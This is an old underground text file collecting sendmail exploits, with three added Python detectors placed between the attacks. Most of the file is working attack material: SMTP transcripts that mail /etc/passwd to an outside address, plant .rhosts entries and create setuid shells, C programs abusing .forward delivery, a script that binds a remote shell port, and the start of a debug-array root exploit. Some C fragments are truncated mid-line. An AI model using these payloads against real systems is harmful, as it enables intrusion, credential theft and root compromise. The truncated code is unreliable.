sendmail2.txt
random garbage
.
rcpt to: /home/zen/.rhosts
mail from: zen
data
evil.com
.
quit
EOSM
evil % /bin/sh evil_sendmail
Trying 128.128.128.1
Connected to victim.com
Escape character is '^]'.
Connection closed by foreign host.
evil % rlogin victim.com -l zen
Welcome to victim.com!
victim %
'-oQ' = DuNNo =
This bug involves the '-q' and the '-oQ' options and causes any file to be
deleted and read. You should create a 'qf'-type file, in the
/usr/spool/mqueue dir, like this:
P28
T599831504
Dfilename
Suser
Ruser
H?P?return-path:
H?F?from: user (User Name)
H?x?full-name: User Name
HTo: user
Hsubject: Gotcha
After the command `sendmail -q -oQ' is issued, file `filename' will be
deleted and its content will be mailed to 'user'.
- - - - The '-oQ' sets the 'Q' option, which selects the directory in which to
queue messages; '-q' makes the daemon process the queue. - - - -
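The queue control file above is the only input the queue run trusts, so the practical check on the defending side is whether each qf file's `D` line names a data file that sendmail itself created in the queue directory. The parser below is an added example, not code from the original text: it reads the tagged-line format shown above (`P`, `T`, `D`, `S`, `R`, `H`) and flags a control file whose data file carries any path component. The two sample control files and the queue directory name `/usr/spool/mqueue` are constructed to mirror the page's example.

```python
"""Parse a sendmail 'qf' queue control file and flag a planted data-file line.

Added example, not part of the original text.  Each line of a qf file starts
with a one-letter tag: P (priority), T (creation time), D (name of the df data
file), S (sender), R (recipient) and H (header, optionally with ?flag?
conditions).  A queue run reads whatever file the D line names, so the check
here is simply whether that name is a bare 'df...' file in the queue directory.
"""
from typing import Dict, List, NamedTuple

QUEUE_DIR = "/usr/spool/mqueue"   # the queue directory named on the page


class QueueFile(NamedTuple):
    priority: str
    created: str
    datafile: str
    sender: str
    recipients: List[str]
    headers: List[str]


def parse_qf(text: str) -> QueueFile:
    """Split TEXT into the fields of a qf control file; unknown tags are ignored."""
    fields: Dict[str, str] = {}
    recipients: List[str] = []
    headers: List[str] = []
    for raw in text.splitlines():
        if not raw:
            continue
        tag, value = raw[0], raw[1:]
        if tag == "R":
            recipients.append(value)
        elif tag == "H":
            headers.append(value)          # "?P?return-path:" keeps its ?flag? prefix
        elif tag in "PTDS":
            fields[tag] = value
    return QueueFile(fields.get("P", ""), fields.get("T", ""),
                     fields.get("D", ""), fields.get("S", ""),
                     recipients, headers)


def datafile_is_safe(qf: QueueFile) -> bool:
    """True only if the D line is a bare 'df...' name, i.e. a file sendmail itself
    created in QUEUE_DIR.  A path component means the qf file was written by hand
    and points at a file elsewhere on the system."""
    name = qf.datafile
    return bool(name) and "/" not in name and name.startswith("df")


def planted_queue_files(qfs: Dict[str, str]) -> List[str]:
    """Names of the qf files (file name -> contents) whose data file fails the check."""
    return [name for name, text in qfs.items()
            if not datafile_is_safe(parse_qf(text))]


# Constructed sample: the control file from the page with the data file pointed
# outside the queue, beside a normal one that names a df file sendmail created.
QF_PLANTED = """P28
T599831504
D/etc/passwd
Suser
Ruser
H?P?return-path:
H?F?from: user (User Name)
H?x?full-name: User Name
HTo: user
Hsubject: Gotcha
"""
QF_NORMAL = """P30
T599831600
DdfAA00123
Salice
Rbob
HTo: bob
"""

if __name__ == "__main__":
    for name in planted_queue_files({"qfAA00123": QF_NORMAL, "qfAA00999": QF_PLANTED}):
        print(f"{QUEUE_DIR}/{name}: data file outside the queue directory")
```

Run it against the contents of every `qf*` file in the queue directory; a hit means someone other than sendmail wrote the control file.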
'|PROGRAM ' = TeSTeD oN 5.55 = ...may be others
Anyone can specify arbitrary shell commands and/or pathnames for the sender
and/or destination address. A typical attack to get the password file is:
% telnet target.com 25
Trying 123.456.789.0...
Connected to target.com
Escape character is '^]'.
220 target.com Sendmail 5.55 ready at Mon, 12 Dec 93 23:51
mail from: "|/bin/mail me@myhost.com < /etc/passwd"
250 "|/bin/mail me@myhost.com < /etc/passwd"... Sender ok
rcpt to: mickeymouse
550 mickeymouse... User unknown
data
354 Enter mail, end with "." on a line by itself
.
250 Mail accepted
quit
Connection closed by foreign host.
%
.forward = 5.61 =
When delivering to files and programs, `sendmail' does not do an
`initgroups(3)' after forking on final delivery. As a result, the sender's
group list remains in effect throughout this stage. This is particularly
serious when root is sending the mail since a program executed out of a
`.forward' file gains interesting privileges like `wheel' and `kmem'. A
related hole can be broken down into a "problem" and an "aggravation". The
"problem" is that queued local mail no longer has the original recipient's
uid associated with it. Control files only store a list of exploded
recipients (i.e. users, files and programs) -- one per line -- each
prefaced with an `R'.
So, after an address resolves to the local machine and has undergone alias
and ".forward" expansion, if the letter happens to get queued, on the
succeeding queue run sendmail doesn't know whom to run the final delivery as.
The "aggravation" is that, when doing this final delivery of queued local
mail, sendmail will `setuid()' itself to the sender's uid if it is
available; in general, the sender's uid will be used when the sender is on
the local machine. As a result, a user can run a program as anyone who
sends them mail from the local machine. There is also an added
"complication"; the default uid and gid are also set to the sender when
delivering mail! Since the default uid and gid are only used when calling
`setuid()' and `setgid()' (to reset the uid/gid before doing final
delivery), these variables should never be set to the sender.
|------------------------------ Local compromise ------------------------------|
Save the following program as "sploit.c" changing MYUID to your user id.
Compile "sploit.c" producing the executable "sploit" in your home
directory. Create a ".forward" file containing:
\<user>, "|<path>/sploit"
[change <user> to your username so you don't lose mail (unless, of course,
you'd rather lose mail) and set <path> to your home directory path (where
sploit lives)]. Now, as another user, send yourself some mail. Note that the
sploit program defers delivery the first time through; check out "/tmp/whoami"
to see that sploit ran as you. Now, run your mail queue (or open a beer and
wait for sendmail to run it). After the queue run, note that sploit accepted
the letter and returned a successful exit status; check out "/tmp/whoami"
again to see that this time, sploit ran as the sender! You can also use
"sploit.c" to test for the root initgroups() hole by checking the group list
when "sploit" was first called.
#include <sys/param.h>
#include <sys/types.h>
#include <stdio.h>
#include <sysexits.h>
#include <pwd.h>
#include <grp.h>
#define MYUID 777 /* your uid (i.e. your ".forward" invokes this) */
#define getuser(uid) getpwuid(uid)->pw_name /* assume valid uid */
#define getgrp(gid) getgrgid(gid)->gr_name /* assume valid gid */
main()
{
FILE *fp;
uid_t myuid;
int i, rval, ngrps, grplst[NGROUPS];
if ((myuid = getuid()) == MYUID)
rval = EX_TEMPFAIL;
else
rval = EX_OK;
if ((fp = fopen("/tmp/whoami", "a")) != NULL) {
/* real user/group ids */
fprintf(fp, "%susr:%s grp:%s",
(rval == EX_OK)? "": "Def> ",
getuser(myuid), getgrp(getgid()));
/* effective user/group ids */
fprintf(fp, " eusr:%s egrp:%s",
getuser(geteuid()), getgrp(getegid()));
/* group list */
if ((ngrps = getgroups(NGROUPS, grplst)) > 0) {
fprintf(fp, " grps:");
for (i = 0; i < ngrps; i++)
fprintf(fp, " %s", getgrp(grplst[i]));
}
fprintf(fp, "\n");
(void) fclose(fp);
}
exit(rval);
}
--------------------- CuT HeRe -------------------------------------------------
===================== trick for sendmail 5.61 ===========================
/*
* 1) set the #define UID, at the top of the program to be yours
* 2) create a file: /tmp/.shell, which is a script to make a suid shell
* 3) compile the program and name it say, /tmp/.magic
* 4) create a .forward file containing: '|/tmp/.magic'
* 5) 'telnet yoursystem 25' and send yourself some fakemail from whoever
* you want a shell from (but not root :-( RATS!)
* 6) wait a bit, it usually works ...
*/
#define UID 777 /* change to your uid */
#include <sys/param.h>
#include <sys/types.h>
#include <stdio.h>
#include <sysexits.h>
#include <pwd.h>
#include <grp.h>
#define SHELLFILE "/tmp/.shell"
main()
{
int myuid, rval;
if ((myuid = getuid()) == UID)
rval = EX_TEMPFAIL;
else {
rval = EX_OK;
system(SHELLFILE);
}
exit(rval);
}
------------------------------ CuT HeRe --------------------------------
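Both of the tricks above hinge on what a user's `.forward` file is allowed to say: a `"|program"` entry runs a program on every delivery, and the sections above show that program running with the sender's uid and group list rather than the recipient's. An administrator auditing a system for this exposure wants to enumerate every `.forward` entry that runs a program, appends to a file, or pulls in more recipients. The classifier below is an added example, not code from the original text; it applies the classic sendmail `.forward` conventions (`\user`, `"|program"`, `/path`, `:include:/path`, plain address) and the "program under /tmp" heuristic is a choice made for this example, not a sendmail rule. The three sample files are constructed in the shape of the page's `\<user>, "|<path>/sploit"` and `'|/tmp/.magic'` files.

```python
"""Audit the contents of a ~/.forward file for program, file and include entries.

Added example, not part of the original text.  sendmail reads ~/.forward as a
comma- or newline-separated list of recipients:
    \\user            deliver to the local mailbox, no further aliasing
    "|/path/prog"     pipe the message to a program
    /path/to/file     append the message to a file
    :include:/path    read more recipients from a file
    anything else     an ordinary mail address
"""
from typing import List, NamedTuple

# Directories where a program named in .forward deserves a second look: anyone
# can create files there.  Heuristic chosen for this example, not a sendmail rule.
SUSPECT_PROGRAM_DIRS = ("/tmp/", "/var/tmp/")


class Entry(NamedTuple):
    text: str       # the entry as written
    kind: str       # "mailbox", "program", "file", "include" or "address"
    note: str       # empty unless the entry deserves attention


def split_entries(content: str) -> List[str]:
    """Split CONTENT on commas and newlines; commas inside double quotes do not split."""
    entries, cur, quoted = [], [], False
    for ch in content:
        if ch == '"':
            quoted = not quoted
            cur.append(ch)
        elif ch in ",\n" and not quoted:
            tok = "".join(cur).strip()
            if tok:
                entries.append(tok)
            cur = []
        else:
            cur.append(ch)
    tok = "".join(cur).strip()
    if tok:
        entries.append(tok)
    return entries


def classify(entry: str) -> Entry:
    """Classify one .forward entry with the conventions listed in the module docstring."""
    body = entry.strip('"')
    if body.startswith("|"):
        rest = body[1:].strip()
        prog = rest.split()[0] if rest else ""
        note = ""
        if not prog.startswith("/"):
            note = "program path is not absolute; resolved via sendmail's PATH"
        elif prog.startswith(SUSPECT_PROGRAM_DIRS):
            note = "program lives in a world-writable directory"
        return Entry(entry, "program", note)
    if body.startswith(":include:"):
        return Entry(entry, "include", "recipients read from " + body[len(":include:"):])
    if body.startswith("/"):
        return Entry(entry, "file", "message appended to " + body)
    if body.startswith("\\"):
        return Entry(entry, "mailbox", "")
    return Entry(entry, "address", "")


def audit_forward(content: str) -> List[Entry]:
    return [classify(e) for e in split_entries(content)]


def risky(entries: List[Entry]) -> List[Entry]:
    """Entries that run a program, write a file or include a file: the ones the
    holes above abuse, and the ones worth listing per user on a system audit."""
    return [e for e in entries if e.kind in ("program", "file", "include")]


# Constructed samples in the shape of the page's two .forward files plus a benign one.
FORWARD_SPLOIT = '\\zen, "|/home/zen/sploit"\n'
FORWARD_MAGIC = '"|/tmp/.magic"\n'
FORWARD_PLAIN = "zen@mailhost.example\n"

if __name__ == "__main__":
    for label, content in (("sploit", FORWARD_SPLOIT), ("magic", FORWARD_MAGIC),
                           ("plain", FORWARD_PLAIN)):
        for e in risky(audit_forward(content)):
            print(f"{label}: {e.kind} entry {e.text!r} {e.note}")
```

Feed it the contents of each home directory's `.forward` (and each `:include:` file it reports) to get the list of accounts on which a delivery runs a program or writes a file.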
Tail creates a daemon shell = TeSTeD oN 5.65 =
Through this sendmail bug, it is possible to become uid daemon (or whatever
your sendmail delivers non-user mail as), or the uid of any user. The
specifics are as follows:
* The envelope From: field, or possibly the Errors-To: header (but I've
not tested it), must be set to the pipe through which a bounce of your mail
will be returned. Typically this is executed by uid daemon.
* An error must be caused in the message such that sendmail will send a
bounce to the From: envelope (or possibly to Errors-To:).
These two conditions are all that is necessary to exploit the bug.
Typically the simplest thing to pipe to is
|/usr/ucb/tail|/usr/bin/sh
aka |/usr/ucb/tail|/bin/sh
That's for SunOS 4.1.3. Other systems may have tail in /usr/bin or /bin;
the PATH is important in this case.
The condition we have used to generate an error is an invalid
Return-Receipt-To: header. There are a plethora of other ways to do so, and
some of them may depend on the specifics of your sendmail; be forewarned.
The last ten lines of your message should contain whatever you wish to do
as uid daemon.
---cut here
[panix!jhawk] |% telnet panix.com 25
Trying 198.7.0.2 ...
Connected to panix.com.
Escape character is '^]'.
220 panix.com 5.65c/IDA-1.4.4 Sendmail is ready at Mon, 8 Nov 1993 19:41:13 -0500
HELO
250 Hello panix.com, why do you call yourself ?
MAIL FROM: |/usr/ucb/tail|/usr/bin/sh
250 |/usr/ucb/tail|/usr/bin/sh... Sender ok
RCPT TO: root
250 root... Recipient ok
DATA
354 Enter mail, end with "." on a line by itself
From: jhawk@panix.com (John Hawkinson)
To: jhawk@panix.com (John Hawkinson)
Return-Receipt-To: |foobar
Subject: This is a large hole in the ground.
X-Disclaimer: We take no responsibility for what might happen
Hi there. Wanna play ball?
#!/bin/sh
#The above line is just in case :-)
echo This is a Serious Bug > /tmp/bug
echo id reports: >> /tmp/bug
/usr/bin/id >> /tmp/bug
echo Fixing this would be good >> /tmp/bug
cp /bin/sh /tmp/bugshell
chmod u+s /tmp/bugshell
echo /tmp/bugshell contains a setuid daemon shell >> /tmp/bug
chmod ugo+rx /tmp/bugshell
.
250 Ok
quit
221 panix.com closing connection
------------------------- CuT HeRe ----------------------------------------
"-C" = oLD =
Read any file. Using the '-C' option causes an alternative configuration
file to be used; if that file is a protected file which is not actually a
sendmail configuration file, `sendmail' will print out some of its contents
as an error message.
It is reported working on DYNIX (3.0.14) and ULTRIX (2.X).
$ sendmail -C /etc/shadow
<contents of /etc/shadow>
4.1 = TeSTeD oN 4.1 =
It allows remote access as bin... and since bin owns the /etc dir you can
gain root.
Rsend needs mconnect, which is a binary that just connects to the host
and sends the data. You can get rid of the ()'s at the beginning and end
of the script, and get rid of the mconnect line, and run it like ./rsend >
file, then ASCII-upload the file to port 25... If it says a lot of stuff like
"Command Unknown" 25 times, then it didn't work.
Here's rsend:
#!/bin/sh
# Copyright, 1992, 1993 by Scott Chasin (chasin@crimelab.com)
#
# This material is copyrighted by Scott Chasin, 1992, 1993. The
# usual standard disclaimer applies, especially the fact that the
# author is not liable for any damages caused by direct or indirect
# use of the information or functionality provided by this program.
#
# Description:
#
# Exploit NEW sendmail hole and bind a port so we can spawn a program.
# Not for distribution under any circumstances
#
# Usage: smail
# default: smail <7001>
port=$3
user=$2
cmd=$4
if [ -z "$2" ]; then
user=daemon
fi
if [ -z "$3" ]; then
port=7002
fi
if [ -z "$4" ]; then
cmd="/bin/csh -i"
fi
(
sleep 4
echo "helo"
echo "mail from: |"
echo "rcpt to: bounce"
echo "data"
echo "."
sleep 3
echo "mail from: $user"
echo "rcpt to: | sed '1,/^$/d' | sh"
echo "data"
echo "cat > /tmp/a.c <
#include <sys/signal.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
reap(){int s;while(wait(&s)!=-1);}main(ac,av)int ac;
int **av;{struct sockaddr_in mya;struct servent *sp
;fd_set muf;int myfd,new,x,maxfd=getdtablesize();
signal(SIGCLD,reap);if((myfd=socket(AF_INET,SOCK_STREAM,
0))<0)exit(1);mya.sin_family=AF_INET;bzero(&mya.sin_addr,
sizeof(mya.sin_addr));if((sp=getservbyname(av[1],"tcp"))
==(struct servent *)0){if(atoi(av[1])<=0)exit(1);mya.sin_port
=htons(atoi(av[1]));}else mya.sin_port=sp->s_port;if(bind(myfd,
(struct sockaddr *)&mya,sizeof(mya)))exit(1);if(listen(myfd,
1)<0)exit(1);loop: FD_ZERO(&muf);FD_SET(myfd,&muf);if
(select(myfd+1,&muf,0,0,0)!=1||!FD_ISSET(myfd,&muf))goto
loop;if((new=accept(myfd,0,0))<0)goto loop;if(fork()
==0){for(x=2;x
Or you can also upload this to port 25. BTW, it gets you in by running a
program that listens on port 7008... you telnet to port 7008. You can then
proceed to create new users in /etc/passwd because you own the /etc
dir... you need to type a ; after every command, and it gives you 1 error
every command... ignore it. The process may be noticed by a few admins.
helo
mail from: |
rcpt to: bounce
data
.
mail from: bin
rcpt to: | sed '1,/^$/d' | sh
data
cat > /tmp/a.c <
#include <sys/signal.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
reap(){int s;while(wait(&s)!=-1);}main(ac,av)int ac;
int **av;{struct sockaddr_in mya;struct servent *sp
;fd_set muf;int myfd,new,x,maxfd=getdtablesize();
signal(SIGCLD,reap);if((myfd=socket(AF_INET,SOCK_STREAM,
0))<0)exit(1);mya.sin_family=AF_INET;bzero(&mya.sin_addr,
sizeof(mya.sin_addr));if((sp=getservbyname(av[1],"tcp"))
==(struct servent *)0){if(atoi(av[1])<=0)exit(1);mya.sin_port
=htons(atoi(av[1]));}else mya.sin_port=sp->s_port;if(bind(myfd,
(struct sockaddr *)&mya,sizeof(mya)))exit(1);if(listen(myfd,
1)<0)exit(1);loop: FD_ZERO(&muf);FD_SET(myfd,&muf);if
(select(myfd+1,&muf,0,0,0)!=1||!FD_ISSET(myfd,&muf))goto
loop;if((new=accept(myfd,0,0))<0)goto loop;if(fork()
==0){for(x=2;x
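Every remote session on this page, from the `.rhosts` script at the top through the 5.55 `|PROGRAM` transcript, the 5.65 tail bounce and the 4.1 rsend script just above, turns on the same thing: an SMTP envelope address (`MAIL FROM` or `RCPT TO`) that names a program (`|...`) or a file (`/...`) instead of a mailbox. That makes the envelope commands the natural place to look when reviewing a transcript or a sendmail session log. The scanner below is an added example, not code from the original text: it matches the two envelope commands (with or without RFC 821 angle brackets), classifies the address, and returns one finding per suspect line. The sample session is constructed from the command forms quoted on the page, interleaved with server replies the scanner ignores; the `Finding` type and the metacharacter set are choices made for this example.

```python
"""Flag SMTP envelope addresses that name a program or a file.

Added example, not part of the original text.  Classic sendmail accepted a
MAIL FROM / RCPT TO address beginning with '|' (deliver to a program) or
'/' (deliver to a file); neither form has any business arriving over the
network, so a transcript review can flag them before reading anything else.
"""
import re
from typing import List, NamedTuple, Optional

# The two envelope commands; the address may or may not be wrapped in <>.
_ENVELOPE_RE = re.compile(
    r"^\s*(MAIL\s+FROM|RCPT\s+TO)\s*:\s*<?(.*?)>?\s*$", re.IGNORECASE)

# Characters that have no place in a mailbox name but matter to a shell.
_SHELL_META_RE = re.compile(r"[|;`$<>]")


class Finding(NamedTuple):
    lineno: int
    command: str      # "MAIL FROM" or "RCPT TO"
    address: str
    reason: str


def classify_address(addr: str) -> Optional[str]:
    """Return why ADDR is suspect, or None if it looks like an ordinary mailbox."""
    a = addr.strip().strip('"')   # sendmail allowed the pipe form to be quoted
    if a.startswith("|"):
        return "program delivery (address starts with '|')"
    if a.startswith("/"):
        return "file delivery (address is an absolute path)"
    if _SHELL_META_RE.search(a):
        return "shell metacharacter in address"
    return None


def scan_session(lines: List[str]) -> List[Finding]:
    """Scan transcript LINES and return one Finding per suspect envelope command."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = _ENVELOPE_RE.match(line)
        if not m:
            continue                      # server replies, HELO, DATA, body lines
        command = re.sub(r"\s+", " ", m.group(1).upper())
        address = m.group(2)
        reason = classify_address(address)
        if reason:
            findings.append(Finding(n, command, address, reason))
    return findings


# Constructed sample: the envelope commands from the page's transcripts plus a
# benign exchange at the end.
SAMPLE_SESSION = [
    "HELO evil.com",
    "250 Hello evil.com",
    "mail from: zen",
    "rcpt to: /home/zen/.rhosts",
    'mail from: "|/bin/mail me@myhost.com < /etc/passwd"',
    "rcpt to: mickeymouse",
    "MAIL FROM: |/usr/ucb/tail|/usr/bin/sh",
    "RCPT TO: root",
    "mail from: bin",
    "rcpt to: | sed '1,/^$/d' | sh",
    "MAIL FROM:<alice@example.org>",
    "RCPT TO:<bob@example.org>",
]

if __name__ == "__main__":
    for f in scan_session(SAMPLE_SESSION):
        print(f"line {f.lineno}: {f.command} {f.address!r}: {f.reason}")
```

The same classifier works on the sender and recipient fields of sendmail's own log lines, and a hit on a host that still runs one of the versions named above is the signal to take it off the network until it is patched.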
-d########### = TeSTeD oN SunOS & SunOS with Sendmail8.6.4 =
This bug is present in all 8.X.X sendmail versions prior to 8.6.7. Here
follow excerpts from Michael Widner's message on Bugtraq with his script
for SunOS and Solaris, and another script tested on SunOS 5.2 with sendmail
8.6.4:
"The important thing to know is that if your sendmail crashes when you pass
it something like -d387654321 then it can most likely be exploited to gain
root access.
Without going into much detail, -dx.y writes y into the debug array as
array[x]=y. Range checking is not performed properly on x, so it's possible
to pass negative integers that pass the range check. Find a key location
before the debug array, overwrite it, and you're in business.
The problem in trying to create a generic script is that the 'key'
locations have different offsets from the debug array for every version of
sendmail. Sometimes they're easy to locate if you can get a core, but
sometimes it is tough to get a core w/o already being root. Also, sometimes
a core tells you nothing.
The following script is Sun specific, and patches are now available for all
versions of Sun sendmail. The script creates a suid root owned copy of
/bin/sh and places it in /tmp. If you're hacking solaris, I'd suggest you
choose some program other than /bin/sh. "
#!/bin/sh
# This script takes advantage of sendmail's (mis)interpretation of
# very large unsigned ints as signed ints when accessing the debug
# array. As is, it will work with the 8 versions of sun sendmail
# that I have access to. Perhaps I'll update it if I find new
# versions of sun sendmail.
# NOTE: This is a Sun specific script. Don't expect it to work with
# any non-sun sendmail.
# -Michael R. Widner (atreus) 3/25/94
#